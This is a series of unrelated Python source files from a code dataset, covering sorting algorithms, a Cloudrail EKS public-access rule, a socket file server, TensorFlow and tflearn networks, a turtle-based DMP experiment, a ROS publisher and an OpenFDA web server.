insertion sort \r\n 4, implements merge sort \r\n 5, implements quick sort and draw the tree of the recursive calls made\r\n 6, implements shell sort \r\n'''\r\noriginal = ['E','X','A','M','P','L','E']\r\n\r\ndef selectionsort(target, length):\r\n '''\r\n SELECTION-SORT(A)\r\n for j ← 1 to n-1\r\n smallest ← j\r\n for i ← j + 1 to n\r\n if A[ i ] < A[ smallest ]\r\n smallest ← i\r\n Exchange A[ j ] ↔ A[ smallest ]\r\n '''\r\n for i in range(length):\r\n s = i\r\n for j in range(i + 1, length):\r\n if target[j] < target[s]:\r\n s = j\r\n target[i], target[s] = target[s], target[i]\r\n return target\r\n\r\ndef bubblesort(target, length):\r\n '''\r\n func bubblesort( var a as array )\r\n for i from 1 to N\r\n for j from 0 to N - 1\r\n if a[j] > a[j + 1]\r\n swap( a[j], a[j + 1] )\r\n end func\r\n '''\r\n for i in range(length): # @UnusedVariable\r\n for j in range(0, length - 1):\r\n if target[j] > target[j + 1]:\r\n target[j], target[j + 1] = target[j + 1], target[j]\r\n return target\r\n\r\ndef insertsort(target, length):\r\n '''\r\n procedure insertionSort( A : array of items )\r\n int holePosition\r\n int valueToInsert\r\n for i = 1 to length(A) inclusive do:\r\n /* select value to be inserted */\r\n valueToInsert = A[i]\r\n holePosition = i\r\n /*locate hole position for the element to be inserted */\r\n while holePosition > 0 and A[holePosition-1] > valueToInsert do:\r\n A[holePosition] = A[holePosition-1]\r\n holePosition = holePosition -1\r\n end while\r\n /* insert the number at hole position */\r\n A[holePosition] = valueToInsert\r\n end for\r\n end procedure\r\n '''\r\n for i in range(1, length):\r\n v = target[i]\r\n p = i\r\n while p > 0 and target[p - 1] > v:\r\n target[p] = target[p - 1]\r\n p = p - 1\r\n target[p] = v\r\n return target\r\n\r\ndef mergesort(target):\r\n '''\r\n procedure mergesort( var a as array )\r\n if ( n == 1 ) return a\r\n var l1 as array = a[0] ... a[n/2]\r\n var l2 as array = a[n/2+1] ... a[n]\r\n\r\n l1 = mergesort( l1 )\r\n l2 = mergesort( l2 )\r\n return merge( l1, l2 )\r\n end procedure\r\n\r\n procedure merge( var a as array, var b as array )\r\n var c as array\r\n while ( a and b have elements )\r\n if ( a[0] > b[0] )\r\n add b[0] to the end of c\r\n remove b[0] from b\r\n else\r\n add a[0] to the end of c\r\n remove a[0] from a\r\n end if\r\n end while\r\n \r\n while ( a has elements )\r\n add a[0] to the end of c\r\n remove a[0] from a\r\n end while\r\n \r\n while ( b has elements )\r\n add b[0] to the end of c\r\n remove b[0] from b\r\n end while\r\n return c\r\n end procedure\r\n '''\r\n if len(target) == 0 or len(target) == 1:\r\n return target\r\n else:\r\n mid = round(len(target) / 2)\r\n l1 = mergesort(target[:mid])\r\n l2 = mergesort(target[mid:])\r\n \r\n return merge(l1, l2)\r\n\r\ndef merge(l1, l2):\r\n r = []\r\n while len(l1) != 0 and len(l2) != 0:\r\n if l1[0] < l2[0]:\r\n r.append(l1[0])\r\n l1.remove(l1[0])\r\n else:\r\n r.append(l2[0])\r\n l2.remove(l2[0])\r\n if len(l1) == 0:\r\n r.extend(l2)\r\n else:\r\n r.extend(l1)\r\n return r\r\n \r\n\r\ndef quciksort(target, left, right):\r\n '''\r\n Step 1 − Choose the highest index value has pivot\r\n Step 2 − Take two variables to point left and right of the list excluding pivot\r\n Step 3 − left points to the low index\r\n Step 4 − right points to the high\r\n Step 5 − while value at left is less than pivot move right\r\n Step 6 − while value at right is greater than pivot move left\r\n Step 7 − if both step 5 and step 6 does not match swap left and right\r\n Step 8 − if left ≥ right, the point where they met is new pivot\r\n \r\n function partitionFunc(left, right, pivot)\r\n leftPointer = left\r\n rightPointer = right - 1\r\n\r\n while True do\r\n while A[++leftPointer] < pivot do\r\n //do-nothing \r\n end while\r\n \r\n while rightPointer > 0 && A[--rightPointer] > pivot do\r\n //do-nothing \r\n end while\r\n \r\n if leftPointer >= rightPointer\r\n break\r\n else \r\n swap leftPointer,rightPointer\r\n end if\r\n end while \r\n swap leftPointer,right\r\n return leftPointer\r\n end function\r\n \r\n Step 1 − Make the right-most index value pivot\r\n Step 2 − partition the array using pivot value\r\n Step 3 − quicksort left partition recursively\r\n Step 4 − quicksort right partition recursively\r\n\r\n procedure quickSort(left, right)\r\n if right-left <= 0\r\n return\r\n else \r\n pivot = A[right]\r\n partition = partitionFunc(left, right, pivot)\r\n quickSort(left,partition-1)\r\n quickSort(partition+1,right) \r\n end if \r\n end procedure\r\n '''\r\n if right - left <= 0:\r\n return target\r\n else:\r\n pivot = partitionFunc(target, left, right)\r\n quciksort(target, left, pivot - 1)\r\n quciksort(target, pivot + 1, right)\r\n return target\r\n\r\n\r\ndef partitionFunc(target, left, right):\r\n pivot = target[left]\r\n\r\n while left < right:\r\n while left < right and target[right] >= pivot:\r\n right -= 1\r\n target[left] = target[right] \r\n \r\n while left < right and target[left] <= pivot:\r\n left += 1\r\n target[right] = target[left] \r\n \r\n target[left] = pivot\r\n return left\r\n\r\ndef shellsort(target, length):\r\n '''\r\n Step 1 − Initialize the value of h\r\n Step 2 − Divide the list into smaller sub-list of equal interval h\r\n Step 3 − Sort these sub-lists using insertion sort\r\n Step 3 − Repeat until complete list is sorted\r\n \r\n procedure shellSort()\r\n A : array of items \r\n /* calculate interval*/\r\n while interval < A.length /3 do:\r\n interval = interval * 3 + 1 \r\n end while\r\n \r\n while interval > 0 do:\r\n for outer = interval; outer < A.length; outer ++ do:\r\n /* select value to be inserted */\r\n valueToInsert = A[outer]\r\n inner = outer;\r\n\r\n /*shift element towards right*/\r\n while inner > interval -1 && A[inner - interval] >= valueToInsert do:\r\n A[inner] = A[inner - interval]\r\n inner = inner - interval\r\n end while\r\n\r\n /* insert the number at hole position */\r\n A[inner] = valueToInsert\r\n end for\r\n\r\n /* calculate interval*/\r\n interval = (interval -1) /3; \r\n end while\r\n end procedure\r\n '''\r\n interval = 0\r\n while interval < length / 3:\r\n interval = interval * 3 + 1 \r\n \r\n while interval > 0:\r\n for outer in range(interval, length):\r\n valueToInsert = target[outer]\r\n inner = outer\r\n\r\n while inner > interval - 1 and target[inner - interval] >= valueToInsert:\r\n target[inner] = target[inner - interval]\r\n inner = inner - interval\r\n\r\n target[inner] = valueToInsert\r\n\r\n interval = int((interval - 1) / 3) \r\n return target\r\n\r\ndef output():\r\n length = len(original)\r\n \r\n print(selectionsort(original[:], length))\r\n \r\n print(bubblesort(original[:], length))\r\n \r\n print(insertsort(original[:], length))\r\n \r\n print(mergesort(original[:]))\r\n \r\n print(quciksort(original[:], 0, length - 1))\r\n \r\n print(shellsort(original[:], length))\r\n \r\noutput()\r\n\r\n\r\n ","sub_path":"2801ICT_Computing_Algorithms/exam_2/sorts_practice.py","file_name":"sorts_practice.py","file_ext":"py","file_size_in_byte":8370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"368679570","text":"from typing import List, Dict\n\nfrom cloudrail.knowledge.rules.aws.aws_base_rule import AwsBaseRule\nfrom cloudrail.knowledge.context.aws.aws_environment_context import AwsEnvironmentContext\nfrom cloudrail.knowledge.rules.base_rule import Issue\nfrom cloudrail.knowledge.rules.rule_parameters.base_paramerter import ParameterType\n\n\nclass PublicAccessEksApiRule(AwsBaseRule):\n\n def get_id(self) -> str:\n return 'public_access_eks_api'\n\n def execute(self, env_context: AwsEnvironmentContext, parameters: Dict[ParameterType, any]) -> List[Issue]:\n issues: List[Issue] = []\n for eks_cluster in env_context.eks_clusters:\n violating_security_group = eks_cluster.security_group_allowing_public_access\n if violating_security_group:\n issues.append(Issue(\n f'~Internet~. '\n f'{eks_cluster.get_type()} `{eks_cluster.get_friendly_name()}` '\n f'is on {eks_cluster.network_resource.vpc.get_type()}'\n f' `{eks_cluster.network_resource.vpc.get_friendly_name()}`. '\n f'Master is protected by security groups '\n f'`{\", \".join([x.get_friendly_name() for x in eks_cluster.network_resource.security_groups])}`. '\n f'{eks_cluster.get_type()} uses subnets'\n f' `{\", \".join([x.get_friendly_name() for x in eks_cluster.network_resource.subnets])}`. '\n f\"Subnets rely on Network ACL's \"\n f'`{\", \".join([x.network_acl.get_friendly_name() for x in eks_cluster.network_resource.subnets])}`. '\n f'They also rely on Route tables '\n f'`{\", \".join([x.route_table.get_friendly_name() for x in eks_cluster.network_resource.subnets])}`. '\n f'{eks_cluster.get_type()} is set to be publicly accessible',\n eks_cluster,\n violating_security_group))\n\n return issues\n\n def should_run_rule(self, environment_context: AwsEnvironmentContext) -> bool:\n return bool(environment_context.eks_clusters)\n","sub_path":"cloudrail/knowledge/rules/aws/context_aware/public_access_validation_rules/public_access_eks_api_rule.py","file_name":"public_access_eks_api_rule.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"422066020","text":"#!/usr/bin/env python3\nfrom socket import *\n#import os\n\nPOST = 9527\nHOST = ''\nBUFSIZE = 1024\n\ndef main():\n #创建socket\n downLoad_ser = socket(AF_INET,SOCK_STREAM)\n #绑定端口bind\n downLoad_ser.bind((HOST,POST))\n #被动接收 listen\n downLoad_ser.listen(128)\n while True:\n #等待客户端连接accept\n downLoad_cli,downLoad_addr = downLoad_ser.accept()\n print('下载客户端的地址是:%s' % str(downLoad_addr))\n \n while True:\n #接收/发送数据 recv/send\n downLoad_file = downLoad_cli.recv(BUFSIZE)\n \n if not downLoad_file:\n print(\"客户端断开连接\")\n downLoad_cli.close()\n break\n else:\n try:\n f = open('downLoad_file.decode()','rb')\n downLoad_file_data = f.read()\n f.close()\n except:\n print(\"%s 文件不存在!\" % downLoad_file.decode())\n downLoad_cli.send(downLoad_file_data)\n #关闭连接close\n downLoad_ser.close()\nif __name__ == \"__main__\":\n main()\n","sub_path":"Socket/downLoad-server.py","file_name":"downLoad-server.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"284229407","text":"# coding=utf-8\n# __project__ = \"使用cnn训练mnist数据集进行分类\"\n# __author__ = \"Nicksphere\"\n# __time__ = \"2018/4/23 下午5:24\"\n\nimport tensorflow as tf\n\nfrom deeplearning import input_data\n\n\n# 构造tensor训练图\ndef train():\n # 28*28=784灰度图的二维像素表示\n x = tf.placeholder(\"float\", [None, 784])\n # w表示每个类别的权重\n W = tf.Variable(tf.zeros([784, 10]))\n # b表示偏置量\n b = tf.Variable(tf.zeros([10]))\n # 载入minist图像数据,60000行训练集mnist.train和10000行的测试数据集mnist.test\n mnist = input_data.read_data_sets('data/', one_hot=True)\n # 最小化交叉熵训练模型,采用梯度下降法\n y_ = tf.placeholder(\"float\", [None, 10])\n sess = tf.InteractiveSession()\n\n # 权重初始化函数\n def weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\n def bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n # 卷积和池化\n def conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\n def max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\n def variable_summaries(var):\n with tf.name_scope(\"summaries\"):\n mean = tf.reduce_mean(var)\n tf.summary.scalar(\"mean\", mean)\n with tf.name_scope('stddev'):\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var-mean)))\n tf.summary.scalar(\"stdevv\", stddev)\n tf.summary.scalar(\"max\", tf.reduce_max(var))\n tf.summary.histogram(\"histogram\", var)\n\n # 第一层卷积\n with tf.name_scope(\"layer1\"):\n w_conv1 = weight_variable([5, 5, 1, 32])\n variable_summaries(w_conv1)\n b_conv1 = bias_variable([32])\n variable_summaries(b_conv1)\n x_image = tf.reshape(x, [-1, 28, 28, 1])\n # 使用relu激活函数\n h_conv1 = tf.nn.relu(conv2d(x_image, w_conv1)+b_conv1)\n # Maxpool的方式池化\n h_pool1 = max_pool_2x2(h_conv1)\n # 第二层卷积\n with tf.name_scope(\"layer2\"):\n w_conv2 = weight_variable([5, 5,32,64])\n variable_summaries(w_conv2)\n b_conv2 = bias_variable([64])\n variable_summaries(b_conv2)\n h_conv2 = tf.nn.relu(conv2d(h_pool1,w_conv2)+ b_conv2)\n h_pool2 = max_pool_2x2(h_conv2)\n # 神经网络全连接层\n with tf.name_scope(\"full_layer\"):\n w_fc1 = weight_variable([7*7*64, 1024])\n variable_summaries(w_fc1)\n b_fc1 = bias_variable([1024])\n variable_summaries(b_fc1)\n h_pool_flat = tf.reshape(h_pool2,[-1, 7*7*64])\n h_fc1 = tf.nn.relu(tf.matmul(h_pool_flat, w_fc1) + b_fc1)\n variable_summaries(h_fc1)\n\n # dropuout层\n with tf.name_scope(\"dropout\"):\n keep_prob = tf.placeholder(\"float\")\n h_fc1_dropout = tf.nn.dropout(h_fc1, keep_prob)\n variable_summaries(h_fc1_dropout)\n # softmax分类输出层\n with tf.name_scope(\"softmax\"):\n w_fc2 = weight_variable([1024, 10])\n variable_summaries(w_fc2)\n b_fc2 = bias_variable([10])\n variable_summaries(b_fc2)\n y_conv = tf.nn.softmax(tf.matmul(h_fc1_dropout, w_fc2) + b_fc2)\n\n cross_entroy = -tf.reduce_sum(y_* tf.log(y_conv))\n variable_summaries(cross_entroy)\n # 选择梯度下降法训练\n train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entroy)\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n variable_summaries(accuracy)\n sess.run(tf.initialize_all_variables())\n\n # 记录\n merged = tf.summary.merge_all()\n log_dir = \"/tmp/tensor/mnist\"\n if tf.gfile.Exists(log_dir):\n tf.gfile.DeleteRecursively(log_dir)\n tf.gfile.MakeDirs(log_dir)\n train_writer = tf.summary.FileWriter('/tmp/tensor/mnist',sess.graph)\n tf.global_variables_initializer().run()\n\n for i in range(10000):\n batch = mnist.train.next_batch(50)\n if i % 100 == 0:\n train_accuracy = accuracy.eval(\n feed_dict={x:batch[0], y_:batch[1], keep_prob:0.5}\n )\n print(\"step %d,trainning accuracy %g\", i, train_accuracy)\n # train_step.run(feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})\n summary, _ = sess.run([merged, train_step], feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})\n train_writer.add_summary(summary, i)\n print(\"test accuracy %g\", accuracy.eval(feed_dict={x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))\n\n\nif __name__ == \"__main__\":\n # print(1)\n train()\n # tf.app.run(main=main)","sub_path":"src/deeplearning/mnistcnn.py","file_name":"mnistcnn.py","file_ext":"py","file_size_in_byte":4755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"157419620","text":"import flask, foobar, multiprocessing, pytest, requests\n\n\n'''\nserver_process = None\ndef setup_module(module):\n global server_process\n server_process = multiprocessing.Process(target=foobar.run_server)\n server_process.start()\n\ndef teardown_module(module):\n server_process.terminate()\n\n@pytest.fixture\ndef server(request):\n server_process = multiprocessing.Process(target=foobar.run_server)\n server_process.start()\n def teardown():\n server_process.terminate()\n request.addfinalizer(teardown)\n'''\n\nhost = 'localhost'\nport = 8000\nurl = 'http://{}:{}/{{}}'.format(host, port)\n\ndef _test_foo():\n response = requests.get(url.format('foo'))\n assert response.status_code == 200\n assert response.content.decode() == 'foo'\n\ndef _test_bar():\n response = requests.get(url.format('bar'))\n assert response.status_code == 200\n assert response.content.decode() == 'bar'\n","sub_path":"tests/test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"372844036","text":"import numpy as np\nimport math as m\nimport copy\nfrom array import array\nimport matplotlib.pyplot as plot\nfrom sklearn.linear_model import Ridge\nimport cma\nimport turtle\nfrom turtle import*\n\n\n################################################################################################################\n # Turtle Implementation #\n ############################################\n\nLOOP_THRESHOLD = 20\n# Create screen and turtle variables\nout_screen = Screen()\nmy_turtle = Turtle(\"turtle\")\nmy_turtle.speed(-1)\n\n# Create two lists to store X and Y coordinates\nx_coords = []\ny_coords = []\n\n# Draw function\ndef turtle_draw(x, y):\n my_turtle.ondrag(None)\n my_turtle.setheading(my_turtle.towards(x, y))\n my_turtle.goto(x, y)\n my_turtle.ondrag(turtle_draw)\n\n # Ensure 0 is always positive\n if(x == -0.0):\n x = 0.0\n\n # Append the x coordinate to the end of the list\n x_coords.append(x)\n\n # Ensure 0 is always positive\n if(y == -0.0):\n y = 0.0\n\n # Append the y coordinate to the end of the list\n y_coords.append(y)\n\n # End drawing session after a certain threshold is reached\n if(len(x_coords) >= LOOP_THRESHOLD):\n turtle.bye()\n\n# The main function\ndef test_turtle():\n turtle.listen()\n\n my_turtle.ondrag(turtle_draw)\n\n out_screen.mainloop()\n\ntest_turtle()\n\n#################################################################################################################################\n # Implementatio of DMP #\n ############################################\nclass DMP(object):\n\n def __init__(self,w,x_asis_of_turtle,y_asis_for_turtle, pastor_mod = False):\n####################################################\n # Data Collection #\n ############################################\n self.pastor_mod = pastor_mod\n #initial values\n self.x0 = 0 #initial position\n self.goal = 20 #goal position\n self.step = 0.1 #The amount of steps in taken in a particular time frame\n\n####################################################\n # Turtle function Implementation #\n ############################################\n #for x in range(len(step)):\n #position\n self.k = 100\n self.d = 2.0 * np.sqrt(self.k)\n self.w = w\n\n self.x_asis_for_turtle = x_coords\n self.y_asis_for_turtle = y_coords\n\n #converges_for_sin\n self.start = self.d / 3 # where it starts converges_for_sin to 0 but won't equal 0\n self.l = 1000.0\n self.b = 20.0 / np.pi\n\n\n#########################################################################################################################################################\n # Implimentation DMP Learning For Turtle Functions #\n ###########################################################\n\n def spring_damping_for_sin(self):\n\n #Think of it as the slope of the function as it goes through\n\n return self.k * (self.y_asis_for_turtle) - self.k * (self.x0) * self.s + self.k\n\n def converges_for_sin(self):\n\n phases = np.exp(-self.start * (((np.linspace(0, 1, len(self.x_asis_of_turtle))))))\n #print(phases)\n return phases #it displays the exponential converges_for_sin\n\n def duplicate_for_sin(self):\n\n #Vertically stack the array with y coordinates and x coordinates divided by the ammount of steps in secs\n original_matrix_1 = np.vstack((np.zeros([1, (self.goal)], dtype = int), (self.y_asis_for_turtle)))\n original_matrix_2 = np.vstack((np.zeros([1, self.goal], dtype = int), original_matrix_1))\n\n F = self.step * self.step * original_matrix_1 - self.d * (self.k * (original_matrix_1 ) - self.step * original_matrix_1)\n temp = np.zeros([20, (self.goal)], dtype = int)\n\n temp[:F.shape[0],:F.shape[1]] = F\n design = np.array([self._features_for_sin() for self.s in self.converges_for_sin()])\n #print(design)\n lr = Ridge(alpha=1.0, fit_intercept=False)\n lr.fit(design, temp)\n self.w = lr.coef_\n\n\n #Think of it as the x-asis of the duplicate_for_sin\n return self.w\n\n def shape_path_for_sin(self, scale=False):\n\n #creating a 2d vector base on the duplicate_for_sin\n f = np.dot(self.w, self._features_for_sin())\n\n return f\n\n def reproduction_for_sin(self, o = None, shape = True, avoidance=False, verbose=0):\n\n #if verbose <= 1:\n #print(\"Trajectory with x0 = %s, g = %s, self.step=%.2f, step=%.3f\" % (self.x0, self.goal, self.step, self.step))\n\n #puts evething that was from X to x; from array to matrix\n x = copy.copy(self.y_asis_for_turtle)\n temp_matrix_of_x1 = copy.copy(x)\n temp_matrix_of_x2 = copy.copy(x)\n\n original_matrix_1 = [copy.copy(temp_matrix_of_x1)]\n original_matrix_2 = [copy.copy(temp_matrix_of_x2)]\n\n #reproducing the x-asis\n t = 0.1 * self.step\n ti = 0\n\n S = self.converges_for_sin()\n while t < self.step:\n t += self.step\n ti += 1\n self.s = S[ti]\n\n #x += temp_matrix_of_x1\n temp_matrix_of_x1 += temp_matrix_of_x2\n\n sd = self.spring_damping_for_sin()\n # the weighted shape base on the movement\n f = self.shape_path_for_sin() if shape else 0.\n C = self.step.obstacle_for_sin(o, x, temp_matrix_of_x1) if avoidance else 0.0\n\n #print(temp_matrix_of_x2)\n\n #Everything that you implemented in the matrix that was temperary will initialize will be put into the none temperary matrix\n if ti % self.step > 0:\n temp_matrix_of_x1 = np.append(copy.copy(x),copy.copy(self.y_asis_for_turtle))\n original_matrix_1 = np.append(copy.copy(self.y_asis_for_turtle),copy.copy(temp_matrix_of_x1))\n original_matrix_2 = np.append(copy.copy(self.y_asis_for_turtle),copy.copy(temp_matrix_of_x2))\n\n self.BlackBox = cma.fmin(cma.ff.linear,self.y_asis_for_turtle,1)\n\n\n print(self.BlackBox[0])\n #for i in range(len(self.BlackBox[0])):\n\n #original_matrix_1[i] *= self.BlackBox[0][i]\n\n temp = np.array(self.y_asis_for_turtle)\n\n #return the matrix as array when returning\n original_matrix_1 = temp * (self.BlackBox[2] / 500)\n\n #return the matrix as array when returning\n return np.array(self.y_asis_for_turtle), np.array(x), np.array(original_matrix_1)\n\n\n def obstacle_for_sin(self, o, original_matrix_1):\n\n if self.y_asis_for_turtle.ndim == 1:\n self.y_asis_for_turtle = self.y_asis_for_turtle[np.newaxis, np.newaxis, :]\n if original_matrix_1.ndim == 1:\n original_matrix_1 = original_matrix_1[np.newaxis, np.newaxis, :]\n\n C = np.zeros_like(self.y_asis_for_turtle)\n R = np.array([[np.cos(np.pi / 2.0), -np.sin(np.pi / 2.0)],\n [np.sin(np.pi / 2.0), np.cos(np.pi / 2.0)]])\n\n for i in xrange(self.y_asis_for_turtle.shape[0]):\n for j in xrange(self.y_asis_for_turtle.shape[1]):\n obstacle_diff = o - self.y_asis_for_turtle[i, j]\n theta = (np.arccos(obstacle_diff.dot(original_matrix_1[i, j]) / (np.linalg.norm(obstacle_diff) * np.linalg.norm(original_matrix_1[i, j]) + 1e-10)))\n C[i, j] = (self.l * R.dot(original_matrix_1[i, j]) * theta * np.exp(-self.b * theta))\n\n return np.squeeze(C)\n\n def _features_for_sin(self):\n\n #getting the y asis base on the x asis, since the amplitude just asolates between 1 and -1\n c = self.converges_for_sin()\n\n #calculate the discrete difference along the y asis\n h= np.diff(c)\n h = np.hstack((h, [h[-1]]))\n phi = np.exp(-h * (self.s - c) ** 2)\n return self.s * phi / phi.sum()\n\n\n\ndef main():\n#########################################################################################\n #title of the sine curve\n plot.title('Demonstration')\n\n #give x axis a label, it is the time\n plot.xlabel('Time represented as t')\n\n #give y asix a label, it is the amplitude\n plot.ylabel('Amplitude - sin(time)')\n\n plot.grid(True, which='both')\n#########################################################################################\n\n w = [None]\n x_asis_of_turtle = [None]\n y_asis_for_turtle = [None]\n dmp = DMP(w,x_asis_of_turtle,y_asis_for_turtle,True)\n\n dmp.x_asis_of_turtle = x_coords\n dmp.y_asis_for_turtle = y_coords\n\n w = dmp.duplicate_for_sin()\n dmp.w = w\n array1, array2, array3 = dmp.reproduction_for_sin(dmp)\n\n array1_a = np.sin(array1)\n plot.plot(dmp.x_asis_of_turtle,array1)\n plot.axhline(y=0, color='green')\n\n array1_b = np.sin(array2)\n plot.plot((dmp.x_asis_of_turtle ),array1)\n plot.axhline(y=0, color='red')\n\n array1_c = np.sin(array3)\n plot.plot(dmp.x_asis_of_turtle,array3)\n plot.axhline(y=0, color='purple')\n plot.show()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cmaes_dmp_turtle.py","file_name":"cmaes_dmp_turtle.py","file_ext":"py","file_size_in_byte":9345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"295678594","text":"#!/usr/bin/python\nimport rospy\nfrom std_msgs.msg import Time\nfrom std_msgs.msg import Duration\n\n\nif __name__ == '__main__':\n\n rospy.init_node('monday_publisher_node')\n\n pub_time = rospy.Publisher('/some_time', Time, queue_size=10)\n pub_dur = rospy.Publisher('/duration_test', Duration, queue_size=10)\n\n rospy.loginfo(\"Initialization complete\")\n rospy.loginfo(\"Start publishing of messages\")\n\n msg_time = Time()\n msg_dur = Duration()\n count = 0\n\n r = rospy.Rate(2)\n while not rospy.is_shutdown():\n msg_time.data = rospy.Time(count, 200*count)\n msg_dur.data = rospy.Duration.from_sec(count)\n rospy.loginfo(\"Current time: %f sec\", msg_time.data.to_sec())\n rospy.loginfo(\"Current duration: %f\", msg_dur.data.to_sec())\n pub_time.publish(msg_time)\n pub_dur.publish(msg_dur)\n count += 1\n r.sleep()\n","sub_path":"all_materials/time_examples/simple_publisher.py","file_name":"simple_publisher.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"163905143","text":"'''\n simple 1 layer network\n'''\nfrom __future__ import division, print_function, absolute_import\n\nimport numpy\nimport tflearn\nfrom tflearn.layers.conv import conv_2d, max_pool_2d\n\n\ndef train(bands_to_use,\n image_size,\n train_images,\n train_labels,\n test_images,\n test_labels,\n number_of_epochs,\n layer_type='one_layer_relu'):\n '''\n trains a single layer neural network\n returns predicted values for the test_images\n '''\n on_band_count = 0\n for b in bands_to_use:\n if b == 1:\n on_band_count += 1\n\n # normalize 0-255 values to 0-1\n train_images = train_images.astype(numpy.float32)\n train_images = numpy.multiply(train_images, 1.0 / 255.0)\n test_images = test_images.astype(numpy.float32)\n test_images = numpy.multiply(test_images, 1.0 / 255.0)\n\n network = tflearn.input_data(shape=[None, image_size, image_size, on_band_count])\n if layer_type == 'one_layer_relu':\n network = tflearn.fully_connected(network, 2048, activation='relu')\n elif layer_type == 'one_layer_relu_conv':\n network = conv_2d(network, 256, 16, activation='relu')\n network = max_pool_2d(network, 3)\n else:\n print(\"ERROR: exiting, unknown layer type for neural net\")\n\n # classify as road or not road\n softmax = tflearn.fully_connected(network, 2, activation='softmax')\n\n # based on parameters from https://www.cs.toronto.edu/~vmnih/docs/Mnih_Volodymyr_PhD_Thesis.pdf\n momentum = tflearn.optimizers.Momentum(\n learning_rate=.005, momentum=0.9,\n lr_decay=0.0002, name='Momentum')\n\n net = tflearn.regression(softmax, optimizer=momentum, loss='categorical_crossentropy')\n\n model = tflearn.DNN(net, tensorboard_verbose=0)\n model.fit(train_images,\n train_labels,\n n_epoch=number_of_epochs,\n shuffle=False,\n validation_set=(test_images, test_labels),\n show_metric=True,\n run_id='mlp')\n\n # batch predictions on the test image set, to avoid a memory spike\n all_predictions = []\n for x in range(0, len(test_images) - 100, 100):\n for p in model.predict(test_images[x:x + 100]):\n all_predictions.append(p)\n\n for p in model.predict(test_images[len(all_predictions):]):\n all_predictions.append(p)\n assert len(all_predictions) == len(test_images)\n\n return all_predictions\n","sub_path":"src/single_layer_network.py","file_name":"single_layer_network.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"486593600","text":"import http.server\nimport socketserver\nimport http.client\nimport json\n\nIP = \"localhost\"\nPORT = 8000\nsocketserver.TCPServer.allow_reuse_address = True\n\nclass OpenFDAClient():\n def get_url(self,choice,first_param, limit):\n headers = {'User-Agent': 'http-client'}\n conn = http.client.HTTPSConnection(\"api.fda.gov\")\n\n if choice != '':\n url = \"/drug/label.json?search=\" + choice + ':' + first_param + '&limit=' + limit\n else:\n url = \"/drug/label.json?limit=\" + limit\n conn.request(\"GET\", url, None, headers)\n\n r1 = conn.getresponse()\n drugs_raw = r1.read().decode(\"utf-8\")\n conn.close()\n search = json.loads(drugs_raw)\n\n return search\n\nclass OpenFDAParser():\n def parser(self, choice, search):\n\n list = []\n for i in range(len(search['results'])):\n if choice == 'active_ingredient'or choice == 'warnings':\n try:\n list.append(search['results'][i][choice][0])\n except KeyError:\n list.append(\"Unknown\")\n elif choice == 'manufacturer_name':\n try:\n list.append(search['results'][i]['openfda'][choice][0])\n except KeyError:\n list.append(\"Unknown\")\n\n return list\nclass OpenFDAHTML():\n def write_data(self, list):\n intro = \"\" + \"\" + \"\" + \"
    \"\n end = \"
\" + \"\" + \"\"\n\n with open(\"empty.html\", 'w') as f:\n f.write(intro)\n for element in list:\n f.write(\"
  • \" + element + \"
  • \")\n f.write(end)\n\n with open('empty.html', 'r') as f:\n file = f.read()\n return file\n\nclass testHTTPRequestHandler(http.server.BaseHTTPRequestHandler):\n def do_GET(self):\n client = OpenFDAClient()\n parser = OpenFDAParser()\n HTML = OpenFDAHTML()\n try:\n if self.path == \"/\":\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n with open(\"search.html\", \"r\") as f:\n menu = f.read()\n self.wfile.write(bytes(menu, \"utf8\"))\n\n elif 'search' in self.path or 'list' in self.path:\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n if 'searchDrug' in self.path:\n choice = \"active_ingredient\"\n elif 'searchCompany' in self.path:\n choice = \"manufacturer_name\"\n else:\n choice = ''\n\n input = self.path.split(\"=\")\n first_param = self.path.split(\"=\")[1].split(\"&\")[0]\n if \"&\" in input[1]:\n if input[2] == '':\n limit = '10'\n else:\n limit = input[2]\n else:\n limit = '10'\n\n search = client.get_url(choice, first_param, limit)\n\n if choice == '':\n if 'Drugs' in self.path:\n choice = 'active_ingredient'\n elif 'Companies' in self.path:\n choice = 'manufacturer_name'\n elif 'Warnings' in self.path:\n choice = 'warnings'\n\n list = parser.parser(choice, search)\n\n file = HTML.write_data(list)\n\n self.wfile.write(bytes(file, \"utf8\"))\n\n elif \"secret\" in self.path:\n self.send_response(401)\n self.send_header('WWW-Authenticate', 'Basic Realm = \"OpenFDA Private Zone\"')\n self.end_headers()\n\n elif \"redirect\" in self.path:\n self.send_response(302)\n self.send_header('Location', 'http://localhost:8000/')\n self.end_headers()\n\n else:\n self.send_response(404)\n 